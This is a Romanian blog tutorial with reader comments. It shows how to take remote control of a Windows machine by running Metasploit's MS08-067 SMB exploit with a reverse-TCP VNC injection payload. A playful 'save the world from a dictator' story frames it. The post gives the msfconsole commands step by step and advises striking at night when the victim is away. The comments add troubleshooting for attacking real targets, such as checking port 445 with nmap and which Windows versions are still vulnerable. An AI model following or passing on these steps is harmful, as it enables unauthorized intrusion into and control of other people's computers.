Metasploit pentru hackerii aspiranți – Cum încorporăm un server VNC pe un sistem țintă (#8)

Bine ați revenit, dragii mei greenhorn hackers!

Hackerii sunt adesea asociați cu tot ceea ce ține de activități clandestine și ilegale, însă acest lucru nu este chiar adevărat. Hackerii sunt din ce în ce mai căutați de către securitatea națională în fiecare țară. În acest ghid, ne vom imagina un scenariu în care, un singur hacker, ar putea salva lumea de la distrugere.

Imaginați-vă că un nou dictator (Dragnea dacă vreți), intră în posesia armamentului nuclear. El începe să amenințe celelalte națiuni cu anihilarea nucleară. Noi, hackerii, am putea fi singurii capabili să salvăm lumea!

În acest hack, vom încorpora un server VNC pe sistemul țintă. VNC (virtual networking computer) ne va permite să preluăm controlul complet al sistemului dictatorului, cu interfața grafică Windows ce apare și pe computerul nostru. Prin acest hack, putem face tot ce poate face dictatorul cu mouse-ul și interfața sa.

Este important să reținem că utilizarea unui VNC nu este sigură. În cazul în care utilizatorul se află la sistemul lui, va vedea mouse-ul mișcându-se și ferestrele deschise, iar în cele din urmă își va da seama ce se întâmplă. Trebuie să folosim această hack doar atunci când suntem siguri că victima nu este la sistemul său. Vom programa hack-ul nostru la toiul nopții, în locația dictatorului.

Haideți să vedem cum am putea salva lumea de acest tiran beligerant!



Încorporarea VNC-ului pe computerul dictatorului

În primul rând, o să pornim singurul instrument de care avem nevoie pentru a salva lumea – Metasploit. În acest hack, vom folosi un nou exploit:

exploit/windows/smb/ms08_067_netapi.

O să tastăm următoarea comandă:

msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

 

Mai departe, va trebui să alegem un payload. Spre deosebire de hack-urile anterioare prezentate pe Blackweb, de data aceasta vom folosi serverul VNC. Acesta ne permite să folosim interfața Windows a victimei, ca și cum ar fi a noastră.

Să tastăm:

msf > set payload/windows/vncinject/reverse_tcp

Înainte de a lansa acest hack, trebuie doar să setăm adresele IP ale RHOST-ului (calculatorul dictatorului sau victimei) și LHOST-ului (sistemul nostru de atac).

Acum, când avem toate informațiile necesare și adăugate în  Metasploit, tot ce trebuie să facem este să tastăm comanda:



msf > exploit

Pasul 2: Preluarea controlului

După cum puteți vedea din screenshot-ul de mai jos, Metasploit a deschis o interfață grafică Windows, conectată la mașina dictatorului nostru și ne-a oferit controlul complet! Pe deasupra, mai avem acces și la shell-ul din Windows.

Când minimizăm shell-ul, vedem ce face nebunul la computer.



După cum vedem din captura de ecran de pe calculatorul său, el elaborează ordinele pentru lansarea ,,atacului său nuclear”…

Hmmm … poate putem dezactiva programul de lansare al rachetelor.

Să aruncăm o privire asupra proceselor sale care rulează. Putem da click pe Control Panel -> Administrative Tools -> Services și vom vedea ce servicii a executat pe computerul său.

După cum putem vedea din Services, el are un task numit “Launch Nuclear Attack” pe computerul său și acesta a început. Dacă putem opri sau dezactiva acest serviciu, îl putem opri înainte de a lansa atacul! Dăm click pe link-ul “Stop” și oprim acest task.

Tocmai am salvat lumea!

Poate că lumea este în siguranță pentru moment, dar foarte probabil o să-și dea seama de ce lansarea rachetelor nu s-a activat, însă noi am făcut ceea ce am putut, și vom trăi pentru a mai lupta și în altă zi. 🙂

Cam atât cu acest tutorial. Nu uitați să reveniți pentru mai multe ghiduri. Dacă aveți nelămuriri, secțiunea comentarii vă stă la dispoziție.

Până data viitoare, să ne citim cu bine! 🙂



5 1 vote
Article Rating
Subscribe
Notify of
guest
6 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Cosmin
Cosmin
2 years ago

Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

Luigi
Luigi
Reply to  Cosmin
2 years ago

Renunta la VirtualBox.

Cosmin
Cosmin
Reply to  Luigi
2 years ago

Nu folosesc asa ceva 😉

Arhitectul
Arhitectul
Reply to  Cosmin
2 years ago

Ai verificat dacă portul 445 este deschis pe server? Poți folosi nmap.
Ce sistem de operare are victima? Pe Win 8 și 10 cu siguranță acest exploit nu mai merge. Și pe ultimele patch-uri pentru 7 s-ar putea ca atacul să fie în zadar… Mai ales dacă are și un antivirus.

Hex
Hex
2 years ago

Salutare,tin sa va multumesc pentru tutoriale si pentru efortul pe care il depuneti,dar in ziua de astazi nu cred ca mai exista foarte multa lume care foloseste windows XP ,in general toata lumea foloseste 7/8/10 , ma gandeam ca puteti face un tutorial ceva mai avansat pentru persoanele care au ceva habar si vor sa se aventureze in tainele pentesting-ului .

Arhitectul
Arhitectul
Reply to  Hex
2 years ago

Salut!

Ai fi surprins să vezi că unele firme folosesc chiar și Windows 98. 🙂 Anyway, mulțumesc pentru sugestie, pe viitor, dacă timpul îmi va permite, voi adăuga o nouă categorie, dedicată exploit-urilor (sunt mii de exploit-uri descoperite pentru Windows, așadar, înțelegi de ce nu prea mă încumet să deschid un astfel de subiect și mă rezum doar la elemente de bază).